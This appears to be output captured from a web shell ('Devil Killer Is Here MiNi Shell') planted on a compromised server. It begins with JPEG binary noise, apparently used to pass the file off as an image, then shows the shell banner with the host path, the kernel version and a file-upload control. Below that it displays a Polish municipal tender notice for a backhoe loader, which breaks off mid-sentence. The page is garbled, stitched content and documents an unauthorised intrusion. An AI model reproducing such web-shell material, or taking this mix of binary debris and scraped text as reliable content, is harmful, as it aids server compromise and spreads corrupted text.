JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211217/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211217/0032027101-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Zakup i dostawa nowej koparko-ładowarki na potrzeby Gminy Ciechocin </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Ciechocin</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 871118572</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Ciechocin 172</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Ciechocin</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">87-408</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">kujawsko-pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL616 - Grudziądzki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">56 683 77 81</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">CIECHOCIN@CIECHOCIN.PL</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://ciechocin.bip.net.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - związek jednostek samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Zakup i dostawa nowej koparko-ładowarki na potrzeby Gminy Ciechocin </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-32fcc847-5f1d-11ec-8c2d-66c2f1230e9c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00320271</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-12-17</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00009615/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.2 Zakup i dostawa nowej koparko-ładowarki na potrzeby Gminy Ciechocin</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/ciechocin <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/ciechocin</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W<br/>postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa<br/>się przy użyciu środków komunikacji elektronicznej za pośrednictwem platformy zakupowej dostępnej<br/>pod adresem https://platformazakupowa.pl/pn/ciechocin 2. Składanie dokumentów wpostępowaniu z<br/>wyjątkiem oferty, odbywa się elektronicznie za pośrednictwem formularza ,,WYŚLIJ WIADOMOŚĆ”<br/>dostępnego na stronie dotyczącej danego postępowania.3. Za datę złożenia dokumentów o których<br/>mowa w ust. 2, przyjmuje się kliknięcie przycisku ”WYŚLIJ WIADOMOŚĆ” po którym pojawi się<br/>komunikat, że wiadomość została wysłana do Zamawiającego. 4. Wymagania techniczne i<br/>organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i<br/>oświadczeń oraz informacji przekazywanych za pośrednictwem platformy zakupowej o której mowa w<br/>ust. 1, opisane zostały w Regulaminie platformazakupowa.pl oraz Instrukcji dla Wykonawców<br/>platformazakupowa.pl, dostępnych na stronie dotyczącej danego postępowania oraz stronie głównej<br/>Platformy pod adresem https://platformazakupowa.pl5. Występuje limit objętości plikówlub<br/>spakowanych folderów w zakresie całej oferty do ilości 10 plików lub spakowanych folderów przy<br/>maksymalnej wielkości 150 MB. 6. Sposób sporządzenia i przekazywania informacji oraz<br/>wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w<br/>postępowaniu o udzielenie zamówienia publicznego musi być zgody z wymaganiami określonymi w<br/>rozporządzeniu Prezesa Rady Ministrów z dnia 31 grudnia 2020 r. (Dz.U. z 2020 poz. 2452)</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z<br/>04.05.2016, str. 1), dalej „RODO”, informuję, że:• administratorem Pani/Pana danych osobowych<br/>jest:Wójt Gminy Ciechocin, Ciechocin 172, 87-408 Ciechocin• inspektorem ochrony danych osobowych<br/>w Gminie Ciechocin jest Michał Daczko adres e-mail: odoserwis@gmail.com • Pani/Pana dane<br/>osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z<br/>postępowaniem o udzielenie zamówienia publicznego na realizację zadania pn. „Zakup i dostawa nowej koparko-ładowarki na potrzeby Gminy Ciechocin ” – numer postępowania KIR.271.1.8.2021, prowadzonym w trybie przetargu<br/>nieograniczonego;• odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym<br/>udostępniona zostanie dokumentacja postępowania w oparciu o art. 8 oraz art. 96 ust. 3 ustawy z dnia<br/>29 stycznia 2004 r. – Prawo zamówień publicznych (t.j Dz. U. z 2019 r. poz. 1843 z późn. zm.), dalej<br/>„ustawa Pzp”;• Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 97 ust. 1 ustawy Pzp,<br/>przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania<br/>umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;• obowiązek<br/>podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem<br/>ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o<br/>udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy<br/>Pzp;• w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób<br/>zautomatyzowany, stosowanie do art. 22 RODO;• posiada Pani/Pan: na podstawie art. 15 RODO<br/>prawo dostępu do danych osobowych Pani/Pana dotyczących; na podstawie art. 16 RODO prawo do<br/>sprostowania Pani/Pana danych osobowych1); na podstawie art. 18 RODO prawo żądania od<br/>administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których<br/>mowa w art. 18 ust. 2 RODO2); prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych<br/>Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza<br/>przepisy RODO;• nie przysługuje Pani/Panu: w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do<br/>usunięcia danych osobowych; prawo do przenoszenia danych osobowych, o którym mowa w art. 20<br/>RODO; na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż<br/>podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO. 1)<br/>Wyjaśnienie: skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania<br/>o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z<br/>ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego załączników.2) Wyjaśnienie:<br/>prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu<br/>zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej<br/>lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa<br/>członkowskiego</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">KIR.271.1.8.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest dostawa maszyn i urządzeń z osprzętem – 1 szt. fabrycznie nowej koparko – ładowarki o mocy 110 – 130 KM z napędem na 4 koła.<br/>2.Szczegółowy opis przedmiotu zamówienia dla - fabrycznie nowej koparko – ładowarki. <br/>Wszystkie wymienione poniżej parametry techniczne i wyposażenie zamawianej maszyny mają charakter wymogów minimalnych. <br/>3.	Podstawowe parametry techniczne: <br/>-koparko-ładowarka spełniająca wymagania pojazdu dopuszczonego do poruszania się po drogach publicznych zgodnie z obowiązującymi przepisami ustawy Prawo o Ruchu Drogowym, posiadająca certyfikat CE, <br/>-dostawca musi być producentem lub autoryzowanym przedstawicielem producenta oferowanej koparko – ładowarki, <br/>-rok produkcji 2021 (fabrycznie nowa), <br/>-masa eksploatacyjna maszyny 8500 – 9500 kg, <br/>-silnik wysokoprężny turbodoładowany o mocy znamionowej 110 – 130 KM, bez filtra cząstek stałych typu DPF, spełniający normę emisji spalin Tire 4, <br/>-maksymalna pojemność silnika 3,0 – 4,0 litra, <br/>-napęd na 4 koła, <br/>-równe koła jezdne min 18” z przodu i min 28” z tyłu<br/>-blokada mechanizmu różnicowego, <br/>-manualna skrzynia biegów maszyny przełączalna pod obciążeniem, <br/>-minimum 4 biegi w przód, minimum 3 biegi w tył, <br/>-2 niezależne układy hamowania, <br/>4.	system hydrauliczny umożliwiający dostosowanie wydajności układu hydraulicznego do bieżącego zapotrzebowania,<br/>-układ hydrauliczny zasilany pompą wielotłoczkową o wydajności 150 - 165 litrów/min i ciśnieniu roboczym minimum 200 bar, <br/>-stabilizatory tylne niezależne, wysuwane hydrauliczne, <br/>-zbiornik paliwa o pojemności minimum 130 litrów, <br/>-oświetlenie drogowe zgodne z wymaganiami pojazdu dopuszczonego do poruszania się po drogach publicznych oraz sygnał cofania, <br/>-błotniki kół przednich i tylnych, <br/>-klimatyzacja. <br/>5.	Podstawowe parametry osprzętu ładowarkowego koparko – ładowarki: <br/>-sterowanie układem ładowarkowym za pomocą joysticka, <br/> -osprzęt musi posiadać system zapewniający samo poziomowanie łyżki łaowarkowej oraz układ stabilizacji łyżki ładowarkowej, <br/>-łyżka ładowarkowa montowana dzielona (otwierana), wielofunkcyjna: min. 6 w 1 możliwość spychania, ładowania, kopania, chwytania, rozściełania i wyrównania, mocowana na sworznie do ramion koparko-ładowarki, z zamontowanymi na łyżce widłami, <br/>-pojemność łyżki ładowarki minimum 1,0 m3, szerokości łyżki od 2,2 m do 2,5 m, <br/>-maksymalna wysokość załadunku do sworznia obrotu minimum 3,4 m, <br/>-udźwig na pełną wysokość w łyżce ładowarkowej minimum 3000 kg, <br/>6.	Podstawowe parametry osprzętu koparkowego podsiębierny koparko-ładowarki: <br/>-sterowanie ramieniem koparkowym za pomocą drążków, <br/>-osprzęt musi posiadać możliwość przesuwu bocznego wysięgnika koparkowego, <br/>-szybkozłącze koparkowe mechaniczne, <br/>-łyżka koparkowa o szerokości 600 mm i 300 mm, <br/>-łyżka skarpowa 1500 mm, <br/>-ramię koparkowe wygięte o zmiennej długości, rozsuwane hydraulicznie (teleskopowe), <br/>-głębokość kopania minimum 5,4 m, <br/>7.	wymagania dodatkowe: <br/>-dostawca powinien być producentem lub autoryzowanym przedstawicielem producenta oferowanej koparko-ładowarki; <br/>-dostawa koparko-ładowarki w ciągu maksymalnie 14 dni od dnia podpisania umowy;<br/>dostawca musi przedstawić „Deklarację zgodności z CE” na oferowaną koparko-ładowarkę; <br/>-zapewniony serwis gwarancyjny i pogwarancyjny koparko-ładowarki; <br/>-odległość autoryzowanego stacjonarnego punktu serwisowego nie więcej niż 150 km od siedziby Zamawiającego. <br/>-zapewniony czas reakcji w przypadku awarii koparko-ładowarki musi wynosić maksymalnie 72 godziny od zgłoszenia licząc w dni robocze, a zakończenie naprawy maksymalnie 14 dni od daty jej rozpoczęcia; <br/>-oferowana maszyna musi być wyposażona w radio fabryczne, fabryczny immobiliser oraz w pakiet podstawowy składający się z gaśnicy, trójkąta ostrzegawczego oraz instrukcji obsługi operatora w języku polskim i katalogu części zamiennych; <br/>-dostawca przeszkoli w cenie dostawy minimum dwóch operatorów Zamawiającego w zakresie budowy i obsługi koparko ładowarki. <br/>8.	Zamawiający ustala minimalny okres gwarancji na przedmiot zamówienia na 36 miesięcy. Bieg terminu gwarancji rozpoczyna się od daty odbioru dostawy.<br/>9.	Zamawiający wymaga pakiet serwisów w czasie trwania gwarancji (materiały eksploatacyjne, robocizna oraz dojazd). <br/>10.	Wykonawca w ramach niniejszego zamówienia zobowiązany jest we własnym zakresie i na własny koszt dostarczyć Zamawiającemu pełną dokumentację techniczną pojazdu oraz wymaganą przez prawo polskie dokumentację niezbędną do rejestracji i ubezpieczenia. Wszystkie dokumenty muszą być sporządzone w języku polskim, związane z eksploatacją i użytkowaniem pojazdu, m. in. instrukcje użytkowania i obsługi pojazdu oraz urządzeń w nim zamontowanych. Dostarczyć książkę gwarancyjną ze szczegółowymi warunkami gwarancyjnymi w języku polskim. <br/>11.	W sytuacji, gdy Zamawiający opisując przedmiot zamówienia użył znaków towarowych, patentów lub pochodzenia, źródła lub szczególnego procesu, który charakteryzuje produkty lub usługi dostarczane przez konkretnego Wykonawcę, działanie takie miało na celu wyłącznie wskazanie oczekiwanych przez Zamawiającego cech dostaw lub usług. Wykonawca w każdym przypadku może zaproponować rozwiązania równoważne opisywanym, gwarantujące osiągnięcie parametrów nie gorszych od wskazanych w dokumentach zamówienia. <br/>12.	Zamówienie musi odpowiadać wymaganiom technicznym i terminowym określonym w SWZ. <br/>13.	Koparka powinna być udostępniona do oględzin w siedzibie Wykonawcy wraz z dokonaniem próby sprawności pojazdu i oceny technicznej. W przypadku złego stanu technicznego pojazdu oraz stwierdzenia, że faktyczne parametry i wyposażenie są niezgodne z parametrami określonymi w specyfikacji Zamawiający odstąpi od podpisania umowy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">43260000-3 - Koparki, czerparki i ładowarki, i maszyny górnicze</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">43300000-6 - Maszyny i sprzęt budowlany</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-01-25</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Podana w ofercie cena ryczałtowa musi uwzględniać wszystkie<br/>wymagania Zamawiającego określone w niniejszej Specyfikacji. Musi obejmować wszelkie koszty<br/>związane z wykonaniem zadania opisanego w SIWZ, dokumentacji projektowej, szczegółowej<br/>specyfikacji technicznej, z uwzględnieniem robót wynikających z wizji lokalnej, obowiązujących<br/>przepisów oraz sprawowania nadzoru wykonawczego na budowie. W oferowanej cenie ryczałtowej<br/>Wykonawca ujmie wszelkie koszty, jakie może ponieść z tytułu należytego oraz zgodnego z umową i<br/>obowiązującymi przepisami wykonania przedmiotu zamówienia, w tym również koszty towarzyszące<br/>wykonaniu, o których mowa w niniejszej Specyfikacji, a także koszty ryzyka Wykonawcy związanego z<br/>wynagrodzeniem ryczałtowym. Cena oferty stanowić będzie ryczałtowe i ostateczne wynagrodzenie<br/>Wykonawcy za wykonanie przedmiotu zamówienia, niezależnie od rozmiaru robót budowlanych i<br/>innych świadczeń oraz ponoszonych przez Wykonawcę kosztów ich realizacji. Wykonawca nie będzie<br/>mógł żądać podwyższenia wynagrodzenia, chociażby w czasie zawarcia umowy nie można było<br/>przewidzieć rozmiaru lub kosztów tych robót i innych świadczeń.Podstawą obliczenia ceny oferty za<br/>roboty budowlane ma być opracowany przez Wykonawcę kosztorys ofertowy sporządzony w oparciu o<br/>przekazaną dokumentację projektową oraz specyfikację techniczną wykonania i odbioru robót z<br/>uwzględnieniem dyspozycji zawartych w niniejszej Specyfikacji.Za ustalenie ilości robót i innych<br/>świadczeń oraz sposób przeprowadzenia na tej podstawie kalkulacji ofertowego wynagrodzenia<br/>ryczałtowego odpowiada wyłącznie Wykonawca.Przyjmuje się, że Wykonawca uwzględnił w cenie<br/>oferty, a tym samym w kosztorysie ofertowym stanowiącym podstawę jej obliczenia, cały zakres robót<br/>ujęty w SIWZ, dokumentacji projektowej oraz specyfikacji technicznej wykonania i odbioru<br/>robót.Przedmiary robót zamieszczone w SWZ są tylko wytycznymi mogącymi służyć do wyceny prac, z<br/>których Wykonawca może skorzystać przy obliczaniu ceny oferty, ale nie ma takiego obowiązku.<br/>Wykonawca ma prawo przedłożyć uzupełnienia do załączonego w SWZ przedmiaru.Zamawiający nie<br/>wymaga złożenia wraz z ofertą kosztorysu ofertowego. W przypadku złożenia kosztorysu ofertowego<br/>przez Wykonawcę wraz z ofertą, nie będzie on podlegał ocenie na etapie badania i oceny ofert.<br/>Kosztorys ofertowy zobowiązany będzie złożyć Wykonawca, którego oferta zostanie uznana za<br/>najkorzystniejszą, po uprawomocnieniu się decyzji o wyborze jego oferty, a przed zawarciem umowy o<br/>udzielenie zamówienia.Kosztorys ofertowy Specyfikacji może zostać wykorzystany jako pomocniczy do<br/>ustalenia rzeczowego zakresu robót budowlanych, do kalkulacji ewentualnych zamówień jak również<br/>do obliczenia należnego wynagrodzenia Wykonawcy w przypadku odstąpienia od umowy.Skutek pominięcia okoliczności, które mogą wpłynąć na cenę przedmiotu zamówienia, obciążać będzie<br/>Wykonawcę. Od Wykonawcy wymagane jest bardzo szczegółowe zapoznanie się z przedmiotem<br/>zamówienia, a także sprawdzenie warunków wykonania zamówienia i skalkulowania ceny oferty z<br/>należytą starannością.Zamawiający wymaga, aby kosztorys ofertowy spełniający wszystkie wymogi<br/>Zamawiającego określone w Specyfikacji, sporządzić metodą kalkulacji uproszczonej, polegającej na<br/>obliczeniu wartości netto danej pozycji kosztorysu, jako iloczynu ilości (liczby) ustalonych przez<br/>Wykonawcę na podstawie dokumentacji projektowej oraz specyfikacji technicznej wykonania i odbioru<br/>robót jednostek przedmiarowych i ceny jednostkowej danej pozycji kosztorysu.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium kosztu oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Koszt</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres Gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:<br/>-Nie podlegają wykluczeniu z postępowania;<br/>-Spełniają warunki udziału w postępowaniu, określone przez Zamawiającego w Ogłoszeniu o zamówieniu i niniejszej SIWZ.<br/>2.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>a)	Kompetencji lub uprawnień do prowadzenia określonej działalności 